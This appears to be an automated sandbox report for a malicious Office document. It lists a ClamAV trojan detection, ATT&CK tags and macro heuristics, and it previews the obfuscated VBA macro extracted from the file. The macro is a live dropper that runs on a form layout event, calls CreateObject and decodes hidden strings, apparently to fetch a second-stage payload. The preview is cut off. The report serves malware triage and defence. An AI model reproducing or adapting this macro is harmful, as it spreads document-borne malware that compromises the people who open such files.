MALICIOUS
124
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The critical ClamAV heuristic indicates the file is malicious, identified as Win.Trojan.Agent-6754302-0. The VBA macro contains a CreateObject call, which is often used to instantiate malicious COM objects for executing code. The macro appears to be designed to download and execute a second-stage payload, although the exact URL is obfuscated within the script.
Heuristics 5
-
ClamAV: Win.Trojan.Agent-6754302-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Agent-6754302-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19225 bytes |
SHA-256: dd830c08cc5ff042873e9a8c94bd24899a26f7004556cd95cf7ed76a5e7a0a16 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "MultiPage1, 0, 0, MSForms, MultiPage"
Private Sub MultiPage1_Layout(ByVal Index As Long)
Dim AitNctyqujbOIhPLHlchUvq As String
Dim LHvHlHbywO As Object
Dim LoVeVmIFVUsdTKApVp As Integer
Dim nuIFOFRTKumgwNMlnI As String
LoVeVmIFVUsdTKApVp = 77
AitNctyqujbOIhPLHlchUvq = "\xhwnu" & "y3Xmjqq"
Set LHvHlHbywO = CreateObject(sqatG(AitNctyqujbOIhPLHlchUvq))
nuIFOFRTKumgwNMlnI = vBESNbknCw("dmGwcNNseuV")
nuIFOFRTKumgwNMlnI = uTnxBLmDnfZms(LHvHlHbywO, nuIFOFRTKumgwNMlnI, LoVeVmIFVUsdTKApVp)
End Sub
Function vBESNbknCw(lqATNPJnlpXYxScj As String) As String
Dim NjkKbpKCeQFA As String
Dim uoUDoEmgffFKxnR As String
Dim AvUxEpQoWx As String
AvUxEpQoWx = "H?a|" & "nSiT" & "\xax~" & "XyJr8" & "7aHRi" & LazG("334a7d6a25") & LazG("25346825") & "%%'Xj" & "Y%%y" & "T{BxJy2N" & "Yjr%" & "{FwnFg" & LazG("716a3f486e4f3a") & "W%-`Y~" & "Ujb-'€65‚" & "€:‚€5‚€" & "=‚€>‚€" & ";‚€6" & "‚€9‚€8‚€7‚€" & "<‚€66‚'%" & LazG("324b2c516a48796e2c") & "1,wNsL,1,Y,1,X," & LazG("312c31585e2c312c54512c312c775e6078592c312c4a52332c312c745358336c4a534a574e6833696e68596e74532c312c662c312c68") & LazG("2c312c7467")
Dim VlMFJBIDrlEKwZM As String
VlMFJBIDrlEKwZM = "oJHy" & ",..%%@%" & LazG("2525586a59") & "2nYjr%" & "%-'[FW'0" & "'Nfg" & "qj'0'?'0'" & LazG("5e5a727947") & "P'.%%-%`Y" & "~Ujb-'€7" & "‚€6‚€" & "5‚€8‚'2K%," & "Gqth,1" & ",hWNUy" & LazG("2c312c582c31") & ",P,.%%.%@%" & "%xjY2NyJr%{fw" & LazG("4e4647714a3f764c395c683525252d25") & "%`Y^ujb-'" & LazG("80358280368227324b2c574a2c312c4b2c") & ".%%.%@%%)P8ZHm\%B%`Y~uJb-'€6‚" & "€7‚€:‚€8"
Dim yjIrCTPsmNVj As String
yjIrCTPsmNVj = "‚€5‚€9‚'2k%,jW[nhJuTnSYRFsF," & "1,x,1,~xYJr,1,jY3X,1,ljW,1,3S,.@%%%%)I;oVp%%B%`Y~UJb-'€7‚€5‚€:‚€6‚€9‚€;‚€8‚'2K%,yj,1,J,1,X^X,1,zJxy,1,y3,1,R3s,1,|jGwJv,.@%%%XjY2nyjr%[fWNfgqJ?po8%-%%`Y~ujb-'€;‚€7‚€9‚€8‚€6"
Dim IaFSNgKelBFwoB As String
IaFSNgKelBFwoB = LazG("82803582") & "€:‚€" & LazG("3c822732") & "k,Y,1" & LazG("2c732c31") & ",R3SJ" & ",1,3" & LazG("68576a69") & "j,1,y" & ",1,n,1" & LazG("2c785e58") & LazG("596a2c312c") & LazG("46516846686d") & "j,.%%." & "@%%xjY" & "%%-," & LazG("564d2c302c") & LazG("7e2c2e25252d25") & "%`Y~u" & LazG("4a622d278036828037") & "‚€5‚€8‚€9" & LazG("8227324b252c523379") & "j],1,x" & "^,1,xYj,1,Y3J" & "SHTiNS," & "1,L,." & "%%.@" & ")€wjeleUFym‚%B%-" & LazG("2d2d278037828036388280363b82803a82803582803b82803982803d82")
Dim qJUfNGK As String
qJUfNGK = "€>‚€" & "6=‚€" & "6:‚€" & "6‚€67" & LazG("8280363c") & "‚€66‚" & "€69‚€<" & "‚€8‚€" & "65‚'2k" & LazG("2c473d2c312c") & "wxnt,1" & ",M,1,sIj" & ",1,R" & "nhwt," & "1,tky|fw" & "j,1,<" & ",1,m" & "jrj[jwx" & LazG("6e742c312c7874") & LazG("6b79473d3c5c6e7369742c31") & ",|xG" & "=<H,1" & ",yfnq,1,rjxG=" & "<,1,sG,1,P," & "1,Y,1,y[j,1,H" & LazG("5a3f473d3c582c312c") & LazG("3d3c596d6a2c312c7a77776a732c2e2e32") & LazG("774a755166686a25252c473d3c")
Dim oKZptQyMl As String
oKZptQyMl = ",1`h" & "Mfwb" & ">7.@" & ")€uFW" & "eYX‚%" & "B%)€We" & "JlUfeY" & LazG("4d82332d27") & LazG("80368280") & LazG("35822725") & "2k%," & "uqny" & LazG("2c312c782c") & LazG("2e334e737b74706a2d") & ",a,.@)€ue" & "FYM‚%B%)€w" & "jeLUF" & LazG("65596d82332d27803682") & "€5‚'%2k," & "ny,1,xuq," & LazG("2e334e737b74706a2d276161272e") & LazG("603533332d29807566776559788233") & "'HetzSy'%27.b%2otns%,a,@)€uFe~Qtfi‚%B%-3-'€7" & "‚€6‚€8‚"
Dim kdclvALNnHqaHfo As String
kdclvALNnHqaHfo = "€5‚'2k%" & ",ojhy,1," & "|2,1,Sj" & ",1,Tg,.%-" & "'€7‚€5‚" & LazG("80368227") & "2k%,j,1,sy,1" & ",Sjy3" & LazG("5c6a6768716e") & ",..3-'€9‚€8" & "‚€6‚€5‚€7‚'" & "%2k%,xyw,1" & LazG("2c692c312c6e736c2c312c7c73") & "qtf," & "1,it," & ".3Ns{tpj--'€7‚€<‚€6‚€9‚€66" & "‚€;‚€8‚€>‚€" & LazG("3a8280363782803d82803635828035822725326b2c6a
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.